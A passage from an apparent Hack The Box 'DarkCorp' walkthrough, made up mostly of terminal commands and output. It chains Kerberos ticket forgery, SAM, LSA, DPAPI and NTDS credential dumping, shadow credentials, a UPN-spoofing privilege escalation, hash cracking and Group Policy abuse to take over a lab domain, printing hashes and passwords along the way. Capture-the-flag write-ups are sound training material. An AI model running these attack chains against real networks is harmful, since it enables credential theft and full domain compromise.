/usr/local/bin/ticketer.py:120: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  aTime = timegm(datetime.datetime.utcnow().timetuple())
[*] Customizing ticket for darkcorp.htb/Administrator
/usr/local/bin/ticketer.py:403: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['authtime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
/usr/local/bin/ticketer.py:404: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encTicketPart['starttime'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
/usr/local/bin/ticketer.py:406: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  ticketDuration = datetime.datetime.utcnow() + datetime.timedelta(days=int(self.__options.duration))
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
/usr/local/bin/ticketer.py:529: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  encRepPart['last-req'][0]['lr-value'] = KerberosTime.to_asn1(datetime.datetime.utcnow())
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in Administrator.ccache
                                                                                                 
┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/ligolo]
└─$ export KRB5CCNAME=$(readlink -f ./Administrator.ccache)
                                                                                                 
┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/ligolo]
└─$ KRB5CCNAME=Administrator.ccache secretsdump.py -dc-ip 172.16.20.1 -k [email protected] -no-pass  -debug
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[+] Impacket Library Installation Path: /home/kali/.local/lib/python3.12/site-packages/impacket
[+] Using Kerberos Cache: Administrator.ccache
[+] Domain retrieved from CCache: DARKCORP.HTB
[+] Returning cached credential for CIFS/[email protected]
[+] Using TGS from cache
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[+] Retrieving class info for JD
[+] Retrieving class info for Skew1
[+] Retrieving class info for GBG
[+] Retrieving class info for Data
[*] Target system bootKey: 0x4cf6d0e998d53752d088e233abb4bed6
[+] Checking NoLMHash Policy
[+] LMHashes are NOT being stored
[+] Saving remote SAM database
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[+] Calculating HashedBootKey from SAM
[+] NewStyle hashes is: True
Administrator:500:aad3b435b51404eeaad3b435b51404ee:88d84ec08dad123eb04a060a74053f21:::
[+] NewStyle hashes is: True
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] NewStyle hashes is: True
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] NewStyle hashes is: True
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] Saving remote SECURITY database
[*] Dumping cached domain logon information (domain/username:hash)
[+] Decrypting LSA Key
[+] Decrypting NL$KM
[+] Looking into NL$1
DARKCORP.HTB/svc_acc:$DCC2$10240#svc_acc#3a5485946a63220d3c4b118b36361dbb: (2025-02-14 20:10:51)
[+] Looking into NL$2
[+] Looking into NL$3
[+] Looking into NL$4
[+] Looking into NL$5
[+] Looking into NL$6
[+] Looking into NL$7
[+] Looking into NL$8
[+] Looking into NL$9
[+] Looking into NL$10
[*] Dumping LSA Secrets
[+] Looking into $MACHINE.ACC
[*] $MACHINE.ACC 
[+] Could not calculate machine account Kerberos keys, only printing plain password (hex encoded)
darkcorp\WEB-01$:plain_password_hex:4100520044006c002600710072005a00640022007400230061003d004f00520063005e006b006e004f005d00270034004b0041003a003900390074006200320031006a0040005a004f004f005c004b003b00760075006600210063004f0075002f003c0072005d0043004c004a005800250075006c002d00440064005f006b00380038002c00270049002c0046004000680027003b004500200021003b0042004d005f0064003b0066002300700068005500440069002f0054002300320022005f004c0056004c003c0049006f002600480076002c005d00610034005500470077004a0076005f003400740054004800
darkcorp\WEB-01$:aad3b435b51404eeaad3b435b51404ee:8f33c7fc7ff515c1f358e488fbb8b675:::
[+] Looking into DPAPI_SYSTEM
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x1004cecdc9b33080d25a4a29126d4590eb555c5f
dpapi_userkey:0x7f3f9f871ea1dafaea01ae4ccf6e3f7ee535e472
[+] Looking into NL$KM
[*] NL$KM 
 0000   DD C9 21 14 B9 23 69 1B  D8 BE FD 57 6B 3C 3E E1   ..!..#i....Wk<>.
 0010   9D 3D 3F 74 82 AF 75 33  FD 74 61 6E B7 24 55 AF   .=?t..u3.tan.$U.
 0020   6F 61 A0 BC 2B 2A 86 CF  6E EC E0 D3 37 98 FE E5   oa..+*..n...7...
 0030   14 54 7D A9 A6 45 19 37  F1 20 24 4B 18 43 19 72   .T}..E.7. $K.C.r
NL$KM:ddc92114b923691bd8befd576b3c3ee19d3d3f7482af7533fd74616eb72455af6f61a0bc2b2a86cf6eece0d33798fee514547da9a6451937f120244b18431972
[+] Exiting NTDSHashes.dump() because SAMR SessionError: code: 0xc00000df - STATUS_NO_SUCH_DOMAIN - The specified domain did not exist.
[*] Cleaning up... 
[*] Stopping service RemoteRegistry

And we can get the root flag:

evil-winrm -u Administrator -i 172.16.20.2 -H 88d84ec08dad123eb04a060a74053f21

This machine made me so tired that I forgot to get the user flag lol. But here;s the solution for it:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ KRB5CCNAME=Administrator.ccache DonPAPI collect -u 'Administrator' -k --no-pass -t web-01.darkcorp.htb -c CredMan
[💀] [+] DonPAPI Version 2.0.1
[💀] [+] Output directory at /home/kali/.donpapi
[💀] [+] Loaded 1 targets
[💀] [+] Recover file available at /home/kali/.donpapi/recover/recover_1739615883
[WEB-01.darkcorp.htb] [+] Starting gathering credz
[WEB-01.darkcorp.htb] [+] Dumping SAM
DonPAPI running against 1 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━   0% -:--:--
[WEB-01.darkcorp.htb] [$] [SAM] Got 4 accounts
[WEB-01.darkcorp.htb] [+] Dumping LSA
[WEB-01.darkcorp.htb] [+] Dumping User and Machine masterkeys
[WEB-01.darkcorp.htb] [$] [DPAPI] Got 4 masterkeys
[WEB-01.darkcorp.htb] [+] Dumping User and Machine Credential Manager
[WEB-01.darkcorp.htb] [$] [CredMan] [SYSTEM] Domain:batch=TaskScheduler:Task:{7D87899F-85ED-49EC-B9C3-8249D246D1D6} - WEB-01\Administrator:But_Lying_Aid9!
DonPAPI running against 1 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Administrator:But_Lying_Aid9!

Dump the next set of DPAPI-protected creds:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ DonPAPI collect -u 'Administrator' -p 'But_Lying_Aid9!' -t web-01.darkcorp.htb -c CredMan
[💀] [+] DonPAPI Version 2.0.1
[💀] [+] Output directory at /home/kali/.donpapi
[💀] [+] Loaded 1 targets
[💀] [+] Recover file available at /home/kali/.donpapi/recover/recover_1739616325
[web-01.darkcorp.htb] [+] Starting gathering credz
[web-01.darkcorp.htb] [+] Dumping SAM
[web-01.darkcorp.htb] [$] [SAM] Got 4 accounts
[web-01.darkcorp.htb] [+] Dumping LSA
[web-01.darkcorp.htb] [+] Dumping User and Machine masterkeys
[web-01.darkcorp.htb] [$] [DPAPI] Got 5 masterkeys
[web-01.darkcorp.htb] [+] Dumping User and Machine Credential Manager
[web-01.darkcorp.htb] [$] [CredMan] [Administrator] LegacyGeneric:target=WEB-01 - Administrator:Pack_Beneath_Solid9!
[web-01.darkcorp.htb] [$] [CredMan] [SYSTEM] Domain:batch=TaskScheduler:Task:{7D87899F-85ED-49EC-B9C3-8249D246D1D6} - WEB-01\Administrator:But_Lying_Aid9!
DonPAPI running against 1 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
                                

spray the password Pack_Beneath_Solid9!
use john.w‘s GenericWrite to make shadow credentials for angela.w:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ bloodyAD --host dc-01 -u john.w -p 'Pack_Beneath_Solid9!' -d darkcorp.htb add shadowCredentials angela.w
[*] Generating certificate
[+] Certificate generated
[*] Generating KeyCredential
[+] KeyCredential generated with following sha256 of RSA key: 4fe63e52b7ca1f17692fef5cc43b074007024be2831665b3f6411292c24ad001
[*] Updating the msDS-KeyCredentialLink attribute of angela.w
[+] msDS-KeyCredentialLink attribute of the target object updated
No outfile path was provided. The certificate(s) will be stored with the filename: 6GkSe7QR
[+] Saved PEM certificate at path: 6GkSe7QR_cert.pem
[+] Saved PEM private key at path: 6GkSe7QR_priv.pem
A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
Run the following command to obtain a TGT:
python3 PKINITtools/gettgtpkinit.py -cert-pem 6GkSe7QR_cert.pem -key-pem 6GkSe7QR_priv.pem darkcorp.htb/angela.w 6GkSe7QR.ccache
                                                                                                 
┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ ls
 20250215041458_BloodHound.zip   jqqvtnad.ccache     ligolo          'WEB-01$.ccache'
 6GkSe7QR_cert.pem               jqqvtnad_cert.pem   PetitPotam      'WEB-01$.pfx'
 6GkSe7QR_priv.pem               jqqvtnad_priv.pem   SharpHound.exe   web-01.ccache
 Administrator.ccache            krbrelayx           SharpHound.ps1   WEB-01.ccache
                                                                                                 
┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ python3 PKINITtools/gettgtpkinit.py -cert-pem 6GkSe7QR_cert.pem -key-pem 6GkSe7QR_priv.pem darkcorp.htb/angela.w  angela.w.ccache
python3: can't open file '/home/kali/Hackthebox/DarkCorp/PKINITtools/gettgtpkinit.py': [Errno 2] No such file or directory
                                                                                                 
┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ python3 ../../PKINITtools/gettgtpkinit.py -cert-pem 6GkSe7QR_cert.pem -key-pem 6GkSe7QR_priv.pem darkcorp.htb/angela.w  angela.w.ccache
2025-02-15 13:22:21,234 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-02-15 13:22:21,243 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2025-02-15 13:22:21,999 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-02-15 13:22:21,999 minikerberos INFO     b15ab24d0f43ba8c228cf33d0d41577f2b523aabb1a807c3aed1d2423be14679
INFO:minikerberos:b15ab24d0f43ba8c228cf33d0d41577f2b523aabb1a807c3aed1d2423be14679
2025-02-15 13:22:22,001 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file
                                                                                                 
┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ KRB5CCNAME=angela.w.ccache python3 ../../PKINITtools/getnthash.py -key KEY_FROM_SHADOWCREDS 'darkcorp.htb/angela.w'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
[-] Non-hexadecimal digit found
                                                                                                 
┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ KRB5CCNAME=angela.w.ccache python3 ../../PKINITtools/getnthash.py -key 4fe63e52b7ca1f17692fef5cc43b074007024be2831665b3f6411292c24ad001  'darkcorp.htb/angela.w'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
[-] ciphertext integrity failure
                                                                                                 
┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ KRB5CCNAME=angela.w.ccache python3 ../../PKINITtools/getnthash.py -key b15ab24d0f43ba8c228cf33d0d41577f2b523aabb1a807c3aed1d2423be14679  'darkcorp.htb/angela.w'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
957246c8137069bca672dc6aa0af7c7a

https://www.pentestpartners.com/security-blog/a-broken-marriage-abusing-mixed-vendor-kerberos-stacks/

Set angela.w‘s UPN to angela.w.adm, and solicit a new TGT of principal type NT_ENTERPRISE:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ bloodyAD --host dc-01 -d darkcorp.htb -u john.w -p 'Pack_Beneath_Solid9!' set object 'CN=Angela Williams,CN=Users,DC=darkcorp,DC=htb' userPrincipalName -v angela.w.adm
[+] CN=Angela Williams,CN=Users,DC=darkcorp,DC=htb's userPrincipalName has been updated

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ impacket-getTGT -hashes :957246c8137069bca672dc6aa0af7c7a -principalType NT_ENTERPRISE darkcorp.htb/angela.w.adm
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in angela.w.adm.ccache
                                           

ksu to angela.w.adm and then su to [email protected]:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ ssh [email protected]                     
[email protected]'s password: 
Linux drip 6.1.0-28-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have no mail.
Last login: Sat Feb 15 04:33:58 2025 from 172.16.20.1
ebelford@drip:~$ ls
agent  angela.w.adm.ccache
ebelford@drip:~$ KRB5CCNAME=angela.w.adm.ccache ksu angela.w.adm
Authenticated [email protected]
Account angela.w.adm: authorization for [email protected] successful
Changing uid to angela.w.adm (1730401107)
angela.w.adm@drip:/home/ebelford$ id
uid=1730401107(angela.w.adm) gid=1730400513(domain users) groups=1730400513(domain users),1730401109(linux_admins)
angela.w.adm@drip:/home/ebelford$ sudo su 
root@drip:/home/ebelford# id
uid=0(root) gid=0(root) groups=0(root)
root@drip:/home/ebelford# 

root@drip:/home/ebelford# strings /var/lib/sss/db/cache_darkcorp.htb.ldb | grep '\$6' | sed 's/.*\$6/\$6/' | sed 's/\\00.*//' | sort | uniq
$6$5wwc6mW6nrcRD4Uu$9rigmpKLyqH/.hQ520PzqN2/6u6PZpQQ93ESam/OHvlnQKQppk6DrNjL6ruzY7WJkA2FjPgULqxlb73xNw7n5.
root@drip:/home/ebelford# 

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp]
└─$ john  -w=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
!QAZzaq1         (?)     
1g 0:00:00:26 DONE (2025-02-15 13:29) 0.03818g/s 3802p/s 3802c/s 3802C/s 020180..thunder22
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

establish and link a new GPO because we have are a member of GPO_MANAGER with taylor:

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/pyGPOAbuse]
└─$ python3 pygpoabuse.py darkcorp.htb/taylor.b.adm:'!QAZzaq1' -gpo-id 652CAE9A-4BB7-49F2-9E52-3361F33CE786 -command 'net localgroup Administrators DARKCORP.HTB\taylor.b.adm /add' -taskname "LocalAdmin" -description "pop" -dc-ip 172.16.20.1 -v
/home/kali/Hackthebox/DarkCorp/pyGPOAbuse/pygpoabuse/scheduledtask.py:54: SyntaxWarning: invalid escape sequence '\%'
  self._task_str = f"""<ImmediateTaskV2 clsid="{{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}}" name="{self._name}" image="0" changed="{self._mod_date}" uid="{{{self._guid}}}"><Properties action="C" name="{self._name}" runAs="%LogonDomain%\%LogonUser%" logonType="InteractiveToken"><Task version="1.3"><RegistrationInfo><Author>{self._author}</Author><Description>{self._description}</Description></RegistrationInfo><Principals><Principal id="Author"><UserId>%LogonDomain%\%LogonUser%</UserId><LogonType>InteractiveToken</LogonType><RunLevel>HighestAvailable</RunLevel></Principal></Principals><Settings><IdleSettings><Duration>PT10M</Duration><WaitTimeout>PT1H</WaitTimeout><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy><DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries><StopIfGoingOnBatteries>true</StopIfGoingOnBatteries><AllowHardTerminate>true</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>false</Hidden><RunOnlyIfIdle>false</RunOnlyIfIdle><WakeToRun>false</WakeToRun><ExecutionTimeLimit>P3D</ExecutionTimeLimit><Priority>7</Priority><DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter></Settings><Triggers><TimeTrigger><StartBoundary>%LocalTimeXmlEx%</StartBoundary><EndBoundary>%LocalTimeXmlEx%</EndBoundary><Enabled>true</Enabled></TimeTrigger></Triggers><Actions Context="Author"><Exec><Command>{self._shell}</Command><Arguments>{self._command}</Arguments></Exec></Actions></Task></Properties></ImmediateTaskV2>"""
/home/kali/Hackthebox/DarkCorp/pyGPOAbuse/pygpoabuse/scheduledtask.py:54: SyntaxWarning: invalid escape sequence '\%'
  self._task_str = f"""<ImmediateTaskV2 clsid="{{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}}" name="{self._name}" image="0" changed="{self._mod_date}" uid="{{{self._guid}}}"><Properties action="C" name="{self._name}" runAs="%LogonDomain%\%LogonUser%" logonType="InteractiveToken"><Task version="1.3"><RegistrationInfo><Author>{self._author}</Author><Description>{self._description}</Description></RegistrationInfo><Principals><Principal id="Author"><UserId>%LogonDomain%\%LogonUser%</UserId><LogonType>InteractiveToken</LogonType><RunLevel>HighestAvailable</RunLevel></Principal></Principals><Settings><IdleSettings><Duration>PT10M</Duration><WaitTimeout>PT1H</WaitTimeout><StopOnIdleEnd>true</StopOnIdleEnd><RestartOnIdle>false</RestartOnIdle></IdleSettings><MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy><DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries><StopIfGoingOnBatteries>true</StopIfGoingOnBatteries><AllowHardTerminate>true</AllowHardTerminate><StartWhenAvailable>true</StartWhenAvailable><RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable><AllowStartOnDemand>true</AllowStartOnDemand><Enabled>true</Enabled><Hidden>false</Hidden><RunOnlyIfIdle>false</RunOnlyIfIdle><WakeToRun>false</WakeToRun><ExecutionTimeLimit>P3D</ExecutionTimeLimit><Priority>7</Priority><DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter></Settings><Triggers><TimeTrigger><StartBoundary>%LocalTimeXmlEx%</StartBoundary><EndBoundary>%LocalTimeXmlEx%</EndBoundary><Enabled>true</Enabled></TimeTrigger></Triggers><Actions Context="Author"><Exec><Command>{self._shell}</Command><Arguments>{self._command}</Arguments></Exec></Actions></Task></Properties></ImmediateTaskV2>"""
INFO:root:Version updated
[*] Version updated
SUCCESS:root:ScheduledTask LocalAdmin created!
[+] ScheduledTask LocalAdmin created!

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/pyGPOAbuse]
└─$ evil-winrm -i dc-01.darkcorp.htb -u taylor.b.adm -p '!QAZzaq1'                        
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\taylor.b.adm\Documents> gpupdate /force
Updating policy...



Computer Policy update has completed successfully.

User Policy update has completed successfully.

===>

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/pyGPOAbuse]
└─$ nxc smb dc-01 -u taylor.b.adm -p '!QAZzaq1' --ntds --user Administrator
SMB         172.16.20.1     445    DC-01            [*] Windows Server 2022 Build 20348 x64 (name:DC-01) (domain:darkcorp.htb) (signing:True) (SMBv1:False)
SMB         172.16.20.1     445    DC-01            [+] darkcorp.htb\taylor.b.adm:!QAZzaq1 (Pwn3d!)
SMB         172.16.20.1     445    DC-01            [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         172.16.20.1     445    DC-01            Administrator:500:aad3b435b51404eeaad3b435b51404ee:fcb3ca5a19a1ccf2d14c13e8b64cde0f:::
SMB         172.16.20.1     445    DC-01            [+] Dumped 1 NTDS hashes to /home/kali/.nxc/logs/DC-01_172.16.20.1_2025-02-15_133234.ntds of which 1 were added to the database
SMB         172.16.20.1     445    DC-01            [*] To extract only enabled accounts from the output file, run the following command:
SMB         172.16.20.1     445    DC-01            [*] cat /home/kali/.nxc/logs/DC-01_172.16.20.1_2025-02-15_133234.ntds | grep -iv disabled | cut -d ':' -f1
SMB         172.16.20.1     445    DC-01            [*] grep -iv disabled /home/kali/.nxc/logs/DC-01_172.16.20.1_2025-02-15_133234.ntds | cut -d ':' -f1

┌──(kali㉿kali)-[~/Hackthebox/DarkCorp/pyGPOAbuse]
└─$ evil-winrm -i dc-01.darkcorp.htb -u Administrator -H 'fcb3ca5a19a1ccf2d14c13e8b64cde0f'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../desktop/root.txt
48ccc2ca67579f0154b4d8abec998a14
*Evil-WinRM* PS C:\Users\Administrator\Documents> 

This was what I wrote on my notes when I finished the machine lol:

Finally